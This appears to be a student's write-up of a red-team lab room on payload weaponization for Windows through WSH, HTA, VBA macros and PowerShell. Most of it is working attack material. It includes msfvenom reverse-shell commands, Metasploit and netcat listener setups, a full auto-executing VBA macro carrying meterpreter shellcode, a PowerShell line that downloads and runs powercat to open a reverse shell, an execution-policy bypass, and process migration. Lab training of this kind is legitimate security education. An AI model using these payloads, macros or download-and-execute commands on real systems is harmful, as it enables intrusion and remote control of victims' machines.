Skip to main content

0202 | Weaponization

Red Teaming | Weaponization | Summary:

The room focuses on alternative scripting techniques used by red teamers to execute payloads in a Windows environment.

Since many organizations restrict or monitor the execution of .exe files, this room explores other methods, including Windows Script Host, HTML Applications, Visual Basic Applications, and PowerShell.

The goal is to learn and practice these techniques, which are commonly used by attackers to bypass security controls and execute malicious code.

Learning Objectives

  • The Windows Script Host (WSH)
  • An HTML Application (HTA)
  • Visual Basic Applications (VBA)
  • PowerShell (PSH)

1 | Introduction

Red Team Toolkits

Red-Teaming-Toolkit | initial access, payload development, delivery methods...

Weaponization is the second stage of the Cyber Kill Chain model, following Reconnaissance. In this phase, attackers create their own malicious code using payloads like Word documents or PDFs to exploit target machines and gain initial access. As many organizations use Windows OS and block .exe files for security, red teamers use alternative methods such as phishing campaigns, social engineering, browser exploitation, USB, or web-based attacks.

Common techniques used during weaponization include:

  • The Windows Script Host (WSH)
  • HTML Applications (HTA)
  • Visual Basic Applications (VBA)
  • PowerShell (PSH)

These methods allow attackers to execute payloads without relying on .exe files, which are often monitored or blocked in controlled environments.

2 | Windows Scripting Host (WSH)

Windows Scripting Host (WSH) is a built-in Windows tool for automating and managing tasks through batch files using Microsoft Visual Basic Scripts (VBScript). It consists of*** cscript.exe*** for command-line scripts and wscript.exe for UI scripts. VBScript executes with regular user permissions, making it useful for red teaming.

cscript.exe (command line) vs. wscript.exe (ui script)

When writing a script for WSH, you should choose between cscript.exe and wscript.exe based on whether your script requires interactive GUI elements or simply needs to execute commands without user intervention.

  1. First, open up a cmd and navigate to your Desktop.
: navigate to desktop
cd C:\Users\thm\Desktop
: create hello.vbs
echo. >hello.vbs
: edit the file with notepad
notepad hello.vbs
  1. Paste in the following demo code.
'<hello.vbs>
Dim message 
message = "Welcome to THM"
MsgBox message
  1. Run it.
wscript hello.vbs
  1. Next, continue with payload.vbs.
: create a file
echo. >payload.vbs
: edit it with notepad
notepad payload.vbs
  1. Paste it the following demo code.
'<payload.vbs>
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True
  1. Run it.
wscript payload.vbs
  1. Modify payload.vbs to payload.txt.
rename payload.vbs payload.txt
  1. And rerun but this time explicitely defining the script engine.
wscript /e:VBScript c:\users\thm\desktop\payload.txt

3 | An HTML Application (HTA)

An HTML Application (HTA) is a self-contained file combining HTML, scripts (e.g., JavaScript, VBScript), and other resources. It allows for dynamic web-like content in a single downloadable executable. Typically executed using the mshta tool (LOLBINS | Living-of-the-land Binaries), which runs either manually or automatically by the internet browser, HTAs enable creation of installations, configurations, or other applications that require all necessary components in one file.

HTA PoC | Local

HTA PoC payload for local cmd.exe execution

  • Step-1 | Create the HTA payload (on attackbox)
    • Create the HTA payload file ("payload.hta") on our attackbox (kali in my case). 
      # change to Desktop
      cd Desktop
      # create the hta file
      touch payload.hta
      # copy and paste the payload into the file
      vim payload.hta
    • HTA PoC Payload for opening cmd.exewith ActiveXObject 
      <html>
      <body>
      <script>
        var c= 'cmd.exe'
        new ActiveXObject('WScript.Shell').Run(c);
      </script>
      </body>
      </html>
  • Step-2 | Serve up the payload via a python web server (on attackbox) 
    # in the same directory where our payload.hta file is resting
    python3 -m http.server 8090
    # wait for connections
  • Step-3 | Download and execute the payload (on targetbox)
    • Use the provide browser (edge) and head over to where your payload is served 
      http://<attackbox-ip>:8090
    • Click on our HTA payload file, and select "Run"
    • If everything worked correctly, a cmd.exe window should pop up for us.

HTA PoC | Reverse Shell

HTA Reverse Connection | Python Web Server

Quote | Port 443 requires root privileges

"On the attacking machine, we need to listen to the port 443 using nc. Please note this port needs root privileges to open, or you can use different ones."

  • Step-1 | Create the reverse shell HTA payload with msfvenom (on attackbox) 
    msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attatckbox-ip> LPORT=443 -f hta-psh -o thm.hta
  • Step-2 | Start the listener (on attackbox) 
    sudo nc -lvp 443
  • Step-3 | Serve up the payload with a python web server (on attackbox) 
    # in the same directory where our reverse shell payload (thm.hta) is located
    python3 -m http.server 8090
  • Step-4 | Download and run the HTA reverse shell payload (on target box)
    • Use the provide browser (edge) and head over to where your payload is served 
      http://<attackbox-ip>:8090
    • Click on our HTA payload file, and select "Run"
  • Step-5 | Catch our reverse shell (on attackbox)
    • Make sure you catched the reverse connection back to the attackbox with the netcat listener and that you have a shell to the target box. Here is an example terminal iteraction how it might look like: 
      ┌──(kali㉿kali)-[~]
      └─$ sudo nc -lvp 443
      listening on [any] 443 ...
      10.10.55.169: inverse host lookup failed: Unknown host
      connect to [10.14.95.186] from (UNKNOWN) [10.10.55.169] 50173
      Microsoft Windows [Version 10.0.14393]
      (c) 2016 Microsoft Corporation. All rights reserved.

      C:\Users\thm\Downloads>whoami
      whoami
      desktop-1au6nt4\thm

      C:\Users\thm\Downloads>

HTA Reverse Connection | Metasploit hta_server module

  • Step-1 | Fire up Metasploit (on attackbox)

    • msfconsole -q

  • Step-2 | Select and configure the hta_server module

    # configure the listener (attackbox)
    set LHOST <attackbox-ip>
    set LPORT 443

    # configure the local host to listen on
    set SRVHOST <attackbox-ip>
    # SRVPORT is set to 8080 by default

    # configure the payload and target
    set payload windows/meterpreter/reverse_tcp
    # meterpreter only compatible with x86 payload

    # configure uri and ssl (optional)
    set uripath /verynicecatpicture.png

    # check configuration
    options

  • Step-3 | Run the HTA Web Server and copy your target URL (on attackbox)

    # properly selected and configured module
    run
    # ...
    # copy the target url
    # here: http://<attackbox>:8080/verynicecatpicture.png

  • Step-4 | Open the Target URL (on targetbox)

    • Use the provide browser (edge) and head over to where your payload is served 
      http://<attackbox>:8080/verynicecatpicture.png
    • Click on our HTA payload file, and select "Run"

  • Step-5 | Catch the reverse shell with Metasploit (on attackbox)

    • If everything worked correctly, a new meterpreter session should have been opened for us
    • Check out the opened session and look around 
      # check out the open sessions in metasploit
      sessions
      # grab the session id responsible for the connection to the targetbox (example:1)

      # switch to the open session -- with session id=1 --> session 1
      session <session-id>

      # check out the user account we are using on the targetbox
      getuid
    • Here is an example how the complete terminal interaction may look like: 
      msf6 exploit(windows/misc/hta_server) > 
      [*] 10.10.55.169     hta_server - Delivering Payload
      [*] Sending stage (177734 bytes) to 10.10.55.169
      [*] Meterpreter session 1 opened (10.14.95.186:443 -> 10.10.55.169:50431) at 2025-01-26 11:16:16 +0000

      msf6 exploit(windows/misc/hta_server) > sessions

      Active sessions
      ===============

        Id  Name  Type                     Information                Connection
        --  ----  ----                     -----------                ----------
        1         meterpreter x86/windows  DESKTOP-1AU6NT4\thm @ DES  10.14.95.186:443 -> 10.10.
                                          KTOP-1AU6NT4               55.169:50431 (10.10.55.169
                                                                      )

      msf6 exploit(windows/misc/hta_server) > sessions -i 1
      [*] Starting interaction with 1...

      meterpreter > whoami
      [-] Unknown command: whoami. Run the help command for more details.
      meterpreter > getuid
      Server username: DESKTOP-1AU6NT4\thm
      meterpreter >

4 | Visual Basic for Application (VBA)

Quote | Combining VBAs with other methods

"It is important to mention that we can combine VBAs with previously covered methods, such as HTAs and WSH. VBAs/macros by themselves do not inherently bypass any detections."

Visual Basic for Applications (VBA) is a programming language developed by Microsoft, integrated into applications like Word, Excel, and PowerPoint. It enables automation of nearly all keyboard and mouse interactions within these office programs. VBA is used to create macros - custom functions that automate repetitive tasks to save time. A notable feature of VBA is its ability to access the Windows Application Programming Interface (API) for low-level functionality.

VBA PoC | Local Actions

VBA PoC (display msg) | Run Manually

  • Step-1 | Open Microsoft Word and create a blank document.
    • You could save it as Word 97-2003 Document with "thm" for the File name.
  • Step-2 | Create the Macro.
    • Select "View" > "Macros" > "View Macros" and add a new macro
      • Macro name: THM
      • Macros in: Document1 (document) (if still unsaved and unnamed)
      • Select "Create"
    • Edit the macro
      • Select "Edit" > the Windows Basic for Applications editor will open
      • Add PoC code to display a message 
        Sub THM()
          MsgBox ("Welcome to Weaponization Room!")
        End Sub
  • Step-3 | Run the Macro.
    • Select "Macros" > "View Macros" > Select created Macro (THM) > "Run"

VBA PoC (display msg) | Run Automatically

  • Step-1 | Same as before
  • Step-2 | Similar to the one before, but modify the macro
    • Modify the Macro to execute the code automatically once the document gets opened 
      Sub Document_Open()
        THM
      End Sub

      Sub AutoOpen()
        THM
      End Sub

      Sub THM()
        MsgBox ("Welcome to Weaponization Room!")
      End Sub
  • Step-3 | Save the document, close it, and open it again
    Macro Security Message

    The first time the Macro tries to run, a security message will pop up indicating that Macros have been disabled and offers the option to enable it.

    • Save it as Word 97-2003 Document with "thm" for the File name.
    • Close the document and edit windows.
    • Reopen the document.
    • Enable Macros

VBA PoC (run calc.exe) | Run Automatically

  • Step-1 | Same as before
  • Step-2 | Similar to the one before, but modify the macro
    PoC Code Breakdown
    • Dim payload As String| declare payload variable as a string
    • payload = "calc.exe" | specify payload name
    • CreateObject("Wscript.Shell").Run payload | create a WSH object and run the payload
    • Modify the Macro to execute calc.exe automatically once the document gets opened 
      Sub Document_Open()
        PoC
      End Sub

      Sub AutoOpen()
        PoC
      End Sub

      Sub PoC()
        Dim payload As String
        payload = "calc.exe"
        CreateObject("Wscript.Shell").Run payload,0
      End Sub
  • Step-3 | Same us before, only, no need to Enable Macros again

VBA PoC | Reverse Shell

  • Step-1 | Create the macro payload with Msfvenom (on attackerbox)
    • Create the VBA payload with metasploit 
      msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attackbox-ip> LPORT=443 -f vba
      • Here is an example how this payload might look like: 
        ┌──(kali㉿kali)-[~/Desktop]
        └─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.14.95.186 LPORT=443 -f vba
        [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
        [-] No arch selected, selecting arch: x86 from the payload
        No encoder specified, outputting raw payload
        Payload size: 354 bytes
        Final size of vba file: 2707 bytes
        #If Vba7 Then
                Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Wrkqiwca As Long, ByVal Dgdxg As Long, ByVal Npvk As LongPtr, Hklzyvndg As Long, ByVal Njlhn As Long, Kuqqjct As Long) As LongPtr
                Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Jefnukei As Long, ByVal Ldrtdbe As Long, ByVal Bxf As Long, ByVal Mtdse As Long) As LongPtr
                Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Gvsijschj As LongPtr, ByRef Qvaqarnr As Any, ByVal Dcuyxjej As Long) As LongPtr
        #Else
                Private Declare Function CreateThread Lib "kernel32" (ByVal Wrkqiwca As Long, ByVal Dgdxg As Long, ByVal Npvk As Long, Hklzyvndg As Long, ByVal Njlhn As Long, Kuqqjct As Long) As Long
                Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Jefnukei As Long, ByVal Ldrtdbe As Long, ByVal Bxf As Long, ByVal Mtdse As Long) As Long
                Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Gvsijschj As Long, ByRef Qvaqarnr As Any, ByVal Dcuyxjej As Long) As Long
        #EndIf

        Sub Auto_Open()
                Dim Enpew As Long, Dsfmfn As Variant, Aeyj As Long
        #If Vba7 Then
                Dim  Pcyg As LongPtr, Yqz As LongPtr
        #Else
                Dim  Pcyg As Long, Yqz As Long
        #EndIf
                Dsfmfn = Array(252,232,143,0,0,0,96,137,229,49,210,100,139,82,48,139,82,12,139,82,20,49,255,139,114,40,15,183,74,38,49,192,172,60,97,124,2,44,32,193,207,13,1,199,73,117,239,82,87,139,82,16,139,66,60,1,208,139,64,120,133,192,116,76,1,208,139,88,32,139,72,24,80,1,211,133,201,116,60,73,139, _
        52,139,1,214,49,255,49,192,193,207,13,172,1,199,56,224,117,244,3,125,248,59,125,36,117,224,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4,139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18,233,128,255,255,255,93,104,51,50,0,0,104,119,115,50,95,84, _
        104,76,119,38,7,137,232,255,208,184,144,1,0,0,41,196,84,80,104,41,128,107,0,255,213,106,10,104,10,14,95,186,104,2,0,1,187,137,230,80,80,80,80,64,80,64,80,104,234,15,223,224,255,213,151,106,16,86,87,104,153,165,116,97,255,213,133,192,116,10,255,78,8,117,236,232,103,0,0,0, _
        106,0,106,4,86,87,104,2,217,200,95,255,213,131,248,0,126,54,139,54,106,64,104,0,16,0,0,86,106,0,104,88,164,83,229,255,213,147,83,106,0,86,83,87,104,2,217,200,95,255,213,131,248,0,125,40,88,104,0,64,0,0,106,0,80,104,11,47,15,48,255,213,87,104,117,110,77,97,255,213, _
        94,94,255,12,36,15,133,112,255,255,255,233,155,255,255,255,1,195,41,198,117,193,195,187,240,181,162,86,106,0,83,255,213)

                Pcyg = VirtualAlloc(0, UBound(Dsfmfn), &H1000, &H40)
                For Aeyj = LBound(Dsfmfn) To UBound(Dsfmfn)
                        Enpew = Dsfmfn(Aeyj)
                        Yqz = RtlMoveMemory(Pcyg + Aeyj, Enpew, 1)
                Next Aeyj
                Yqz = CreateThread(0, 0, Pcyg, 0, 0, 0)
        End Sub
        Sub AutoOpen()
                Auto_Open
        End Sub
        Sub Workbook_Open()
                Auto_Open
        End Sub

                                                                                                          
        ┌──(kali㉿kali)-[~/Desktop]
        └─$
  • Step-2 | Adjust VBA PoC payload for MS word instead of MS Excel (on attackbox)
    • Change Workbook_Open() to Document_Open() to make it suitable to MS Word Documents
      • Before the Adjustment 
        ...<OMITTED-FOR-BREVITY>...
        Sub Workbook_Open()
                Auto_Open
        End Sub
      • After the Adjustment 
        ...<OMITTED-FOR-BREVITY>...
        Sub Document_Open()
                Auto_Open
        End Sub
  • Step-3 | Copy the payload, save it into the macro editor (attackbox -> targetbox)
  • Step-4 | Set up a listener (on attackbox) 
    # run mfs
    msfconsole -q
    # select the multi handler module for catching the our reverse shell connection
    use exploit/multi/handler
    # adjust the payload type to match the one we generated with msfvenom for the VBA payload
    set payload windows/meterpreter/reverse_tcp

    # configure local host
    set LHOST <attackbox-ip>
    set LPORT 443

    # run the listener
    run
  • Step-5 | Open the document | trigger the payload execution (on targetbox)
  • Step-6 | Catch the reverse shell (on attackbox)
    • Check out the opened sessions in your listener
    • example | this is how it might look like 
      ...<OMITTED-FOR-BREVITY>...
      [*] Started reverse TCP handler on 10.14.95.186:443 
      [*] Sending stage (177734 bytes) to 10.10.10.117
      [*] Meterpreter session 1 opened (10.14.95.186:443 -> 10.10.10.117:50847) at 2025-01-26 16:20:45 +0000

      meterpreter > getuid
      Server username: DESKTOP-1AU6NT4\thm
      meterpreter >

5 | PowerShell (PSH)

PowerShell (PSH)

PowerShell, also known as PowerShell Core or PSH, is a cross-platform task automation solution made up of a command-line shell, a scripting language, and a configuration management framework.

It is built on the .NET platform and provides a more powerful and flexible environment than traditional command shells, enabling administrators and developers to automate tasks, configure systems, and manage resources efficiently.

PowerShell supports both cmdlets (commandlets) and .NET objects, providing a wide range of functionalities for managing Windows, Linux, and macOS systems.

PSH PoC | Local

Executing PowerShell Scripts Locally

  • Simple PS Script to display message
    • save it as "thm.ps1"
    Write-Output "Welcome to the Weaponization Room!"
    • try to run it --> will fail due to the Execution Policy 
      powershell -File thm.ps1
    • Check out the current Execution Policy
      • by default, it is disabled (Restricted) on Windows
      • Restricted | permits individual commands but not the running of any scripts
      Get-ExecutionPolicy
  • Changing the Execution Policy 
    Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
  • Bypass Execution Policy | Run Simple PS Script locally
    • bypass | nothing is blocked or restricted
    powershell -ex bypass -File thm.ps1

PSH PoC | Reverse Shell

Get a reverse shell with PowerCat (written in PS)

  • Step-1 | Download PowerCat (on attackbox) 
    git clone https://github.com/besimorhino/powercat.git
  • Step-2 | Serve up the PS payload "powercat.ps1" (on attackbox) 
    cd powercat
    # serve up the current directory with a python web server | including 'powercat.ps1'
    python3 -m http.server 8080
  • Step-3 | Start the listener (on attackbox) 
    nc -lvp 1337
  • Step-4 | Download and execute the PS Payload (on targetbox) 
    powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<attackbox-ip>:8080/powercat.ps1');powercat -c <attackbox-ip> -p 1337 -e cmd"
  • Step-5 | Catch the reverse shell (on attackbox)
    • Wait for the reverse shell to drop into your netcat listener.

6 | Command And Control (C2 or C&C)

Command and Control (C2) refers to post-exploitation frameworks used by red teamers to collaborate and manage compromised machines. These tools are crucial during offensive cyber operations. Popular C2 frameworks include:

  • Cobalt Strike | A commercial framework for Adversary Simulations and Red Team Operations, offering advanced techniques like covert communications, key-logging, file transfers, privilege escalation, mimikatz, port scanning, and lateral movement.
  • PowerShell Empire | An open-source framework enabling collaboration across multiple servers using keys and shared passwords. It focuses on client-side and post-exploitation of Windows and Active Directory environments.
  • Metasploit | A widely-used exploitation framework for easy hacking, known as one of the primary tools for pentesting and red team operations. It is open-source and used in this room for generating payload during weaponization.

These C2 frameworks often employ techniques covered in this room to prepare for initial access stages.

7 | Delivery Techniques

Delivery techniques are crucial for initial access, requiring professional, legitimate, and convincing approaches. Common methods include:

  • Email Delivery | Sending phishing emails with malicious links or attachments to trick victims into visiting malicious websites or downloading/running files. Red teamers may use their infrastructure (DKIM, SPF, PTR records) or third-party services like Gmail, Outlook. Compromised company email accounts can also be used for targeted phishing.

  • Web Delivery | Hosting payloads on a red team-controlled web server with a clean domain reputation and TLS certificate. Techniques involve social engineering victims to visit or download malicious files, potentially using zero-day exploits or compromised software like Java or browsers. URL shorteners can aid this method.

  • USB Delivery: Physically distributing malicious USB devices at conferences or events. Techniques include Rubber Ducky, USBHarpoon, and charging cables with hidden malware (e.g., O.MG Cable). This method may be effective in environments allowing USB usage, while organizations often restrict it for security reasons.

8 | Migrating with Metasploit

MSFVenom Cheat Sheet

Check out the MSFVenom Cheat Sheet.

Migrating with Metasploit

Quote | Note for Doc files

"the simulation used in the provided Windows 10 machine will open the malicious Word document and be closed within 90 seconds. In order to get longer prescience, you need to migrate as soon as you receive the connection back."

  • idea | inject our current process into an other process on the victim machine
    • example | migrate from the current MS word document process into an other process to make the connection stable even if the MS word document is closed
    # within msfconsole
    run post/windows/manage/migrate